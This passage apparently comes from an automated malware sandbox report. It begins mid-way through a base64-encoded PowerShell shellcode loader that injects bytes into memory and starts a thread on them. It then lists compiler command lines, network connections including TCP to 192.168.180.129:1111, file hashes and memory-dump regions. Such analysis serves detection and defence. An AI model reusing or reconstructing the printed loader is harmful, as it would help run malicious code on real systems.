FQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAZABPAEgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xf4jrptd\xf4jrptd.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4F0A.tmp" "c:\Users\Admin\AppData\Local\Temp\xf4jrptd\CSC94DF806A913F4A66B93AB611688E484B.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
N/A 192.168.180.129:1111 tcp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 52.111.227.11:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 91.16.208.104.in-addr.arpa udp

Files

memory/1728-0-0x00007FF7A2E00000-0x00007FF7A2E23000-memory.dmp

memory/3020-1-0x00007FFAEE693000-0x00007FFAEE695000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o4di4z1c.z5g.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3020-8-0x00000238BA170000-0x00000238BA192000-memory.dmp

memory/3020-12-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

memory/3020-13-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

memory/2572-23-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

memory/2572-24-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

memory/2572-25-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

memory/1896-26-0x0000000003000000-0x0000000003036000-memory.dmp

memory/1896-27-0x0000000005740000-0x0000000005D68000-memory.dmp

memory/1896-29-0x0000000005F20000-0x0000000005F86000-memory.dmp

memory/1896-30-0x0000000005F90000-0x0000000005FF6000-memory.dmp

memory/1896-28-0x0000000005630000-0x0000000005652000-memory.dmp

memory/1896-40-0x0000000006100000-0x0000000006454000-memory.dmp

memory/1896-41-0x00000000065E0000-0x00000000065FE000-memory.dmp

memory/1896-42-0x0000000006630000-0x000000000667C000-memory.dmp

memory/1896-44-0x0000000006B20000-0x0000000006B3A000-memory.dmp

memory/1896-43-0x0000000007E20000-0x000000000849A000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\xf4jrptd\xf4jrptd.cmdline

MD5 1b1f1112c06e556df074221940af90e0
SHA1 0a2b467ce09ad6af036eb0b5d4952addb171dd5a
SHA256 e3a47020301b443b26d6450097d04056002e230505419d8ffeb9a026b7d28e2c
SHA512 c77935e8a20d14b4280d8f836fca5344b2afa5fe84a33889240204fdc88872e18feff9c3e8f7506a866082bdea86900146752ca8969d85ad0b309b6f4a325a49

\??\c:\Users\Admin\AppData\Local\Temp\xf4jrptd\xf4jrptd.0.cs

MD5 7319070c34daa5f6f2ece2dfc07119ee
SHA1 f26a4a48518a5608e93c8b77368f588b0433973c
SHA256 b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc
SHA512 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

\??\c:\Users\Admin\AppData\Local\Temp\xf4jrptd\CSC94DF806A913F4A66B93AB611688E484B.TMP

MD5 339996f6c731ccdf41bf1b38ec7d3f76
SHA1 7397eb2f415c73d2ec6799a67c73ac3e3e3f382b
SHA256 6190466ee0ba64a08b8670add1a10289a9c6aab6ea9e7dc4037d6b1c3fc0eea9
SHA512 8a7100953106afd221e7c2130a9caa1c2e97b73554ef1fdd6d9beb8a380403395166800d1997bace99d01a0e0f013a7dabb1133b0f36bf07089672ba14501f2b

C:\Users\Admin\AppData\Local\Temp\RES4F0A.tmp

MD5 709dfc10d9b8d54e429407f95a75f529
SHA1 a3c00faf2594622d8dde4bc9cc0a8897285f28b2
SHA256 f258c05c2cfff69d29ca782a6a7a8ff68c211aa7adc90408bb54d784f16d84da
SHA512 36bbdc8e8f691e5534b2db5fdea5004c272212e0494c0a72a94419e2ad11b50582855cee5b995bf396d432f273cba66d845c72a94606253adbd9061f1864f566

memory/1896-57-0x0000000006B90000-0x0000000006B98000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xf4jrptd\xf4jrptd.dll

MD5 1454ccec910d4fc8f29103e737a2d8bb
SHA1 c497f3392a4b743db8c703f6c3611d52bd6838f2
SHA256 ed6a866c20ab33166e5b8ef1fa5d16c73f57aef2e667644bfd54b6960d8c7d8e
SHA512 fdaba9bc1559106812e93be91b11413595705ba95378867a17a6ee8cb71946cffd21d0f549c97ca6816e15a0ba07160cac6521efb7dd072d0dcd84b62c53b4a8

memory/1896-59-0x00000000077C0000-0x00000000077C1000-memory.dmp

memory/3020-60-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp

memory/2572-62-0x00007FFAEE690000-0x00007FFAEF151000-memory.dmp